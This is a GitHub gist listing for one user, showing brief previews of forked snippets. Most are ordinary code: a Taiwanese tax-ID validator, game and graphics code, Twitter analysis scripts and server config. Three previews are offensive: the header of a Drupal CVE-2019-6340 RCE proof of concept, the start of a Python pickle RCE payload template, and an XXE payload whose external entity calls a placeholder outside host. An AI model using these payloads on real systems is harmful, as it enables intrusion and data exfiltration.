Skip to content

Instantly share code, notes, and snippets.

View manuelbua's full-sized avatar

dudez manuelbua

77 followers · 1 following
View GitHub Profile
@manuelbua
manuelbua / cve-2019-6340.py
Created March 2, 2019 13:16 — forked from leonjza/cve-2019-6340.py
CVE-2019-6340
#!/usr/bin/env python3
# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC
# 2019 @leonjza
# Technical details for this exploit is available at:
# https://www.drupal.org/sa-core-2019-003
# https://www.ambionics.io/blog/drupal8-rce
# https://twitter.com/jcran/status/1099206271901798400
@manuelbua
manuelbua / pickle-payload.py
Created October 10, 2018 18:27 — forked from mgeeky/pickle-payload.py
Python's Pickle Remote Code Execution payload template.
#!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#
import cPickle
import sys
import base64
@manuelbua
manuelbua / gist:546ee860bb2b4172f638666df1a87979
Created April 10, 2018 18:42 — forked from kaochenlong/gist:1889703
台灣公司統一編號判斷規則
# encoding: utf-8
def company_serial_no_checker(serial)
# 共八位,全部為數字型態
at_least_8_digits = /^\d{8}$/
return false unless at_least_8_digits.match(serial)
# 各數字分別乘以 1,2,1,2,1,2,4,1
# 例:統一編號為 53212539
@manuelbua
manuelbua / XXE_payloads
Created August 20, 2016 21:00 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@manuelbua
manuelbua / gist:1711eaf709cba76b46fd
Created February 10, 2016 09:31 — forked from LearnCocos2D/gist:77f0ced228292676689f
Overview of Entity Component System (ECS) variations with pseudo-code

For background and further references see: Entity Component Systems on Wikipedia

ECS by Scott Bilas (GDC 2002)

Entity->Components->Update
  • entity = class: no logic + no data OR at most small set of frequently used data (ie position)
  • component = class: logic + data
foreach entity in allEntities do
    foreach component in entity.components do
@manuelbua
manuelbua / analyze.py
Created August 22, 2014 12:56 — forked from Zulko/analyze.py
'''
Rewrite with Twittcher ;)
Result (every 20 seconds):
>>> Most common words: [('ferguson', 41), ('http', 28), ('protests', 9),
('missouri', 9), ('leave', 8), ('continue', 8),...]
'''
import re
from collections import Counter
from twittcher import SearchWatcher
@manuelbua
manuelbua / analyze.py
Created August 22, 2014 12:56 — forked from howdydoody123/analyze.py
'''
A script for analyzing twitter stats on Ferguson
'''
import json
import re
import tweepy
def get_api():
'''
@manuelbua
manuelbua / GpuShadows.java
Created August 9, 2014 16:15 — forked from mattdesl/GpuShadows.java
import com.badlogic.gdx.ApplicationListener;
import com.badlogic.gdx.Gdx;
import com.badlogic.gdx.Input.Keys;
import com.badlogic.gdx.InputAdapter;
import com.badlogic.gdx.backends.lwjgl.LwjglApplication;
import com.badlogic.gdx.graphics.Color;
import com.badlogic.gdx.graphics.GL10;
import com.badlogic.gdx.graphics.OrthographicCamera;
import com.badlogic.gdx.graphics.Pixmap.Format;
import com.badlogic.gdx.graphics.Texture;
@manuelbua
manuelbua / flask-upload
Created June 1, 2014 10:16 — forked from dAnjou/flask-upload
<VirtualHost *>
ServerName example.com
WSGIDaemonProcess www user=max group=max threads=5
WSGIScriptAlias / /home/max/Projekte/flask-upload/flask-upload.wsgi
<Directory /home/max/Projekte/flask-upload>
WSGIProcessGroup www
WSGIApplicationGroup %{GLOBAL}
Order deny,allow
@manuelbua
manuelbua / ListJavaFonts.java
Created February 4, 2014 10:49
import java.awt.GraphicsEnvironment;
public class ListJavaFonts
{
public static void main(String[] args)
{
String fonts[] =
GraphicsEnvironment.getLocalGraphicsEnvironment().getAvailableFontFamilyNames();